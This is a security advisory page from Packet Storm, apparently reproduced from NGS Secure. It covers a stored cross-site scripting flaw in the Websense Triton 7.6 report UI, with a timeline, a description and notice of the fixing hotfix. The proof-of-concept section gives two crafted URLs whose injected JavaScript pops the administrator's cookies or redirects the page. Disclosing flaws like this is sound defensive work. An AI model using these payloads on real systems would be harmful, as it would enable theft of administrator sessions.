exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Websense (Triton 7.6) Stored Cross Site Scripting

Websense (Triton 7.6) Stored Cross Site Scripting
Posted May 2, 2012
Authored by Ben Williams | Site ngssoftware.com

Websense (Triton version 7.6) suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | d95e2e527117d8f43289052a25656bb74a06860ac147a2a7878d7156ade95f33

Websense (Triton 7.6) Stored Cross Site Scripting

Change Mirror Download
=======
Summary
=======
Name: Websense (Triton 7.6) stored XSS in report management UI
Release Date: 30 April 2012
Reference: NGS00141
Discoverer: Ben Williams <ben.williams@ngssecure.com>
Vendor: Websense
Vendor Reference:
Systems Affected:
Risk: High
Status: Published

========
TimeLine
========
Discovered: 2 November 2011
Released: 2 November 2011
Approved: 2 November 2011
Reported: 2 November 2011
Fixed: 2 December 2011
Published: 30 April 2012

===========
Description
===========
Websense (Triton 7.6) stored XSS in report management UI

Websense is one of the world's best known web-filter products.

Websense (Triton 7.6) is prone to stored XSS in the report management UI enabling an attacker run arbitrary javasript in the context of the administrators browser and the Websense administrative UI.

The exploit would require an attacker to:

- Gain access to the reporting UI using the attack described in NGS-00138
- Request a crafted URL which stores some Javascript in the favourites XML file
- when an admin view the page the Javascript is executed

=================
Technical Details
=================
I. VULNERABILITY
-------------------------
Websense (Triton 7.6) stored XSS in report management UI

II. BACKGROUND
-------------------------
Websense is one of the world's best known web-filter products.

The "Triton" administrative UI allows administration of multiple Websense solutions, including their Email, Web, and DLP products

http://www.websense.com/

III. DESCRIPTION
-------------------------
Websense (Triton 7.6) is prone to stored XSS in the report management UI enabling an attacker run arbitrary javasript in the context of the administrators browser and the Websense administrative UI.

IV. PROOF OF CONCEPT
-------------------------
Affected URL:

https://192.168.233.30:9443/explorer_wse/favorites.exe
(though I believe there may be other affected URLs)

Examples:

Alert pop-up containing the cookies

https://192.168.233.30:9443/explorer_wse/favorites.exe?Program=ws_irpt.exe&params=startDate=2011-10-29^endDate=2011-10-
29^rnd=936737^&favName=---------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
%22,%2215%22,%229%22,%2228%22,%2215%22,%229%22,%2228%22]]%3b%0D%09alert%28document.cookie%29%3b%0D%09//&user=admin&uid=&action=add&startDate=2011-10-29&endDate=2011-10-
29&vrn=

Arbitrary redirect

https://192.168.233.30:9443/explorer_wse/favorites.exe?Program=ws_irpt.exe&params=startDate=2011-10-29^endDate=2011-10-
29^rnd=936737^&favName=---------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
%22,%2215%22,%229%22,%2228%22,%2215%22,%229%22,%2228%22]]%3bdocument.location%20%3d%20%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%33%33%2e%31%31%2findex2.html
%22%3b//&user=admin&uid=&action=add&startDate=2011-10-29&endDate=2011-10-29&vrn=

In these cases when and administrator subsequently runs a report, the javascript is executed. There are other ways to execute Javascript when the page is initially loaded (but I thought this was a good example).

===============
Fix Information
===============
This issue is addressed in Hotfix 24, which can be downloaded at:
https://www.websense.com/content/mywebsense-hotfixes.aspx

NGS Secure Research
http://www.ngssecure.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close